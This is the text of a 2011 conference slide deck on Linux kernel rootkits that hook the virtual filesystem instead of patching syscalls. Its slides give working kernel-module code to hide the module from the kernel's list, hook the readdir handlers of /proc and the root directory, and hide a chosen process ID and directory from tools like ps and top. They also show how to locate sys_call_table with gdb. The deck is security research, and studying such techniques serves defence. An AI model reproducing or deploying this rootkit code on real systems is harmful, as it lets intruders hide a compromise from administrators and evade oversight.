1. Linux rootkits without syscall patching, (the VFS way) Confraria SECURITY & IT – 28 Set 2011

3. Computer Science Degree

4. InfoSec & SuperBock Stout addicted

5. OS X, Slackware, FreeBSD, OpenBSD, Solaris fanatic

6. Java, .Net, Python, Ruby, C, C++, ASM Lover

7. Windows (All versions) , Perl (All versions) and Printers (Yes, they came from hell !) hater

8. root, right here :)2

10. Linux 2.{5,6} kernel – what changed ?

11. The Virtual Filesystem (VFS)

12. Meet /proc, our friend!

13. Introducing

14. Show time 

15. Retrospect

16. Questions & Answers3

18. User-land Trojaned binaries mostly

19. Easy to spot

20. Easy to code

21. However, hard to hide!

22. LRK5 was a good bastard…4

24. The Kernel-land approach

25. Loadable Kernel Modules or /dev/kmem “patching”

26. Syscall patching

27. Easy to code

28. Less easy to findAdore & suckit were also good bastards! 5

29. Linux rootkits – how they were? extern void *sys_call_table[]; int init_module(void) { original_call = sys_call_table[__NR_open]; sys_call_table[__NR_open] =evil_open; return 0; } 6

31. OMG! sys_call_table[] no longer exported!!!

32. Even if you find it, it will be read-only

33. Workaround:

34. Find IDT

35. Find the 0x80 interrupt

36. Get the system_call() function location

37. Use gdb kung fu and search memory for sys_call_table[] within this function7

38. Linux 2.{5,6} – what changed? $ gdb -q /usr/src/linux/vmlinux (no debugging symbols found)...(gdb) disass system_call … 0xc0106bf4 : call *0xc01e0f18(,%eax,4) … (gdb) print &sys_call_table $1 = ( *) 0xc01e0f18 8

40. Exports a set of interfaces for every individual filesystem

41. Each filesystem must “implement” this interface in order to become a common file model

42. Some interesting players are:

43. struct dentry;

44. struct file_operations;

45. struct inode_operations;9

47. Including the ones located at /proc even if “in memory”

48. And… most user-land tools rely on /proc to get information!

49. This tools include:

50. ps

51. netstat

52. top

53. mount

54. And many, many others…

55. Remember struct file_operations ? 10

57. A research born VFS rootkit capable of:

58. Hide itself  No sh*t sherlock?

59. Hide processes

60. Hide files and directories

61. TTY sniffing11

63. The kernel have internal functions to “unlink” the unloaded modules from the list

64. Just use them wisely 12

65. Module hiding static struct module *m = THIS_MODULE; void hideme(void){ kobject_del(&m->mkobj.kobj); list_del(&m->list); } 13

66. “Hook” the Virtual Filesystem (/proc) static struct file_operations *proc_fops;  remember again?  void hook_proc(void){ /* we are not /proc yet */ key = create_proc_entry(KEY,0666,NULL); /* now we become /proc :) */ proc = key->parent; /* save the original, we will need it later*/ proc_fops = (struct file_operations *)proc->proc_fops; original_proc_readdir = proc_fops->readdir; /* tha hook */ proc_fops->readdir = fuckit_proc_readdir; } 14

67. “Hook” the Virtual Filesystem (/) static struct file *f; int hook_root(void){ f = filp_open("/",O_RDONLY,0600); if(IS_ERR(f)){ return -1; } original_root_readdir = f->f_op->readdir; f->f_op->readdir=fuckit_root_readdir; filp_close(f,NULL); return 0; } 15

68. Process hiding static inline int fuckit_proc_filldir(void *__buf, const char *name, int namelen, loff_t offset, u64 ino, unsigned d_type){ //our hidden PID :) if(!strcmp(name,HIDDEN_PID) || !strcmp(name,KEY)){ return 0; } return original_filldir(__buf,name,namelen,offset,ino,d_type); } static inline int fuckit_proc_readdir(struct file *filp, void *dirent, filldir_t filldir){ //save this, we will need to return it later original_filldir = filldir; return original_proc_readdir(filp,dirent,fuckit_proc_filldir); } 16

69. File and Directory hiding static int fuckit_root_filldir(void *__buf, const char *name, int namelen, loff_t offset, u64 ino, unsigned d_type){ //if is our hidden file/directory return nothing! :) if(strncmp(name,HIDDEN_DIR,namelen)==0){ return 0; } return original_root_filldir(__buf,name,namelen,offset,ino,d_type); } static int fuckit_root_readdir(struct file *filp, void *dirent, filldir_t filldir){ //save this, we will need to return it later original_root_filldir = filldir; return original_root_readdir(filp,dirent,fuckit_root_filldir); } 17

70. Seeing is believing 18

72. VFS hooks, they also do the job!

73. It is a good approach, however it has some cons

74. It is possible to “brute force” /proc for hidden pids

75. You should let the Linux scheduler do this job!

76. Hypervisor rootkits will kill -9 every kernel rookits on earth! 19

78. WangYao “Rootkit on Linux x86 v2.6” [Apr 21, 2009]

79. Dump “hideme (ng)”. Internet: http://trace.dump.cz/projects.php [Jan 25, 2011]

80. Ubra “Process Hiding & The Linux scheduler”. Internet: http://www.phrack.org/issues.html?issue=63&id=18 [Jan 25, 2011]20

81. 21

82. Questions & Answers ? 22